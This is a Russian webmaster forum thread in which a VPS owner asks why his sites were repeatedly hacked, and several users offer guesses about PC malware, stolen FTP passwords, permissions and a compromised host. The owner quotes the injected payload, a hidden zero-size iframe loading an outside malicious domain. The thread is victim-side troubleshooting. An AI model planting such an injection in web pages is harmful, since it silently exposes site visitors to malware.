X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

4 страниц V   1 2 3 4 >
Открыть тему
Тема закрыта
> Взлом сервера
vissavi
vissavi
Topic Starter сообщение 17.5.2012, 13:49; Ответить: vissavi
Сообщение #1


Бывалый
****

Группа: User
Сообщений: 364
Регистрация: 28.1.2008
Поблагодарили: 82 раза
Репутация:   24  


здравствуйте. Недавно у меня взломали сервер и внесли изменения почти во все файлы с расширением php (добавили код который переадресует пользователей с поисковых систем на другие сайты) из-за этого много сайтов вылетели из индекса... добавили новые файлы (создали дополнительные странички, внесли изменения в карту сайта) и т.д. Я это все выявил, восстановил из чистого архива движки сайтов. По безопасности сделал следующее: запретил использование почтовых портов, ssh, и вход в админ панель только с одного ip адреса (он у меня статический). Но вот сегодня обнаружил, что опять на сайтах произошли изменения. Согласно журнала был вход под моим ip с 00-43 до 00-50 и изменены файлы в основном index.php внесли фрейм вида "<iframe src="http://mazahack.net/go.ph4lb" width=0 height=0 frameborder=0></iframe>" ...
Хостинг от firstvds.ru, виртуальный выделенный сервер.
Подскажите пожалуйста как такое стало возможным (статический адрес только у меня такой) и как я смогу себя обезопасить. Спасибо.


--------------------
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
livercom
livercom
сообщение 17.5.2012, 13:55; Ответить: livercom
Сообщение #2


Завсегдатай
*****


Группа: Banned
Сообщений: 545
Регистрация: 22.5.2011
Из: Папуа — Новая Гвинея
Поблагодарили: 113 раз
Репутация:   13  


Ну если все, как вы описали, то вредоносные программы осуществляли свою деятельность с вашего компьютера.


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
House
House
сообщение 17.5.2012, 14:44; Ответить: House
Сообщение #3


Завсегдатай
*****


Группа: Banned
Сообщений: 628
Регистрация: 2.11.2011
Из: Саранск
Поблагодарили: 154 раза
Репутация:   19  


Вы стали частью ботнета olen.gif

или вируса, трояна и т.п.


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
saraus
saraus
сообщение 17.5.2012, 14:54; Ответить: saraus
Сообщение #4


Старожил
******

Группа: Active User
Сообщений: 1219
Регистрация: 21.6.2011
Поблагодарили: 418 раз
Репутация:   67  


(vissavi @ 17.5.2012, 12:49) *
под моим ip с 00-43 до 00-50


Ну если так, то зараза внутри скорее всего, надо чистить всё


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Goodhoster
Goodhoster
сообщение 17.5.2012, 15:40; Ответить: Goodhoster
Сообщение #5


Бывалый
****

Группа: User
Сообщений: 268
Регистрация: 3.12.2010
Поблагодарили: 65 раз
Репутация:   7  


надо делать анализ, смотря как настроены пользователь файлов и права доступа, не стоят ли права 777.
Если процессы запускаются от пользователяи и права 644 - значит их изменили скорее всего под пользователем сайта, и скорее всего через данные доступа по FTP как часто бывает.
Если Вы сохраняете пароль для FTP у себя на ПК в клиенте FTP - значит у Вас вирус на ПК, поменяйте пароли и не сохраняйте.
Если например в w7 прикрепили FTP как диск там есть возможность и сохранили пароль - 100% с Вашего ПК крадут пароль.

на сервере проверьте папки /tmp /var/tmp может там скрипты вредоносные, но скорее всего FTP ...


--------------------
Goodhoster.NET - надежный профессиональный хостинг! ( Украина | Германия )
Хостинг | ВПС | Серверы | Домены


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
expssh
expssh
сообщение 17.5.2012, 19:42; Ответить: expssh
Сообщение #6


Участник
***

Группа: User
Сообщений: 128
Регистрация: 12.7.2011
Поблагодарили: 8 раз
Репутация:   1  


Можем предоставить защищенный хостинг, если заинтересованы, обращайтесь в ICQ: 212073065


--------------------
http://economhost.com
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
asAlbert
asAlbert
сообщение 17.5.2012, 19:49; Ответить: asAlbert
Сообщение #7


http://http://http://http
*****

Группа: Active User
Сообщений: 992
Регистрация: 15.12.2009
Из: /dev/null
Поблагодарили: 221 раз
Репутация:   62  


Тут предлагают услуги по чистки гадости на серверах, свяжитесь с ними

http://udalit-virus-s-saita.ru/
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
livercom
livercom
сообщение 17.5.2012, 20:23; Ответить: livercom
Сообщение #8


Завсегдатай
*****


Группа: Banned
Сообщений: 545
Регистрация: 22.5.2011
Из: Папуа — Новая Гвинея
Поблагодарили: 113 раз
Репутация:   13  


(expssh @ 17.5.2012, 18:42) *
Можем предоставить защищенный хостинг, если заинтересованы, обращайтесь в ICQ: 212073065

И чем же он защищен?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
vissavi
vissavi
Topic Starter сообщение 17.5.2012, 20:46; Ответить: vissavi
Сообщение #9


Бывалый
****

Группа: User
Сообщений: 364
Регистрация: 28.1.2008
Поблагодарили: 82 раза
Репутация:   24  


комп проверил - чист. и первый раз проверял.... Сейчас сменил пароли, закрыл ftp полностью. Понаблюдаю..

Висит в фоновых заданияю такая ерунда:
buydomain

var/run/ispmgr/buydomain.asdasdasdasadsdas.ru

это нормально?

Сообщение отредактировал vissavi - 17.5.2012, 20:54


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
rjksdfhe
rjksdfhe
сообщение 17.5.2012, 20:54; Ответить: rjksdfhe
Сообщение #10


Straight arms
*******

Группа: Active User
Сообщений: 2760
Регистрация: 21.4.2009
Из: Мытищи, МО, РФ
Поблагодарили: 1111 раз
Репутация:   163  


По описанному в первом посте, и если свой комп чист - только одно остаётся - взломали вашего хостера, и по полной программе (доступ, понятно, там есть и полный).

В первую очередь надо логи посмотреть. Кто, куда, откуда.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
4 страниц V   1 2 3 4 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) SystemIP.ru - VPS и сервера в более чем 50 странах
11 SystemIP 2176 Вчера, 12:58
автор: SystemIP
Открытая тема (нет новых ответов) INXY - выделенные сервера, сети доставки контента (CDN), облачные решения
1 АдамГрир 761 25.11.2016, 18:41
автор: АдамГрир
Горячая тема (нет новых ответов) Чистим сайты от вирусов, рекомендации, проверка сервера на уязвимость!
77 Rxp 30579 22.11.2016, 10:21
автор: Diamantkey
Горячая тема (нет новых ответов) EuroHoster.org - виртуальные и выделенные сервера, лицензии ПО
172 WebGraf 51605 18.11.2016, 14:57
автор: WebGraf
Открытая тема (нет новых ответов) NetEngi - Хостинг от 108р / ВДС от 250р / Выделенные сервера от 1880р.
0 CloudeS 412 16.11.2016, 23:36
автор: CloudeS


 



RSS Текстовая версия Сейчас: 10.12.2016, 12:47
Дизайн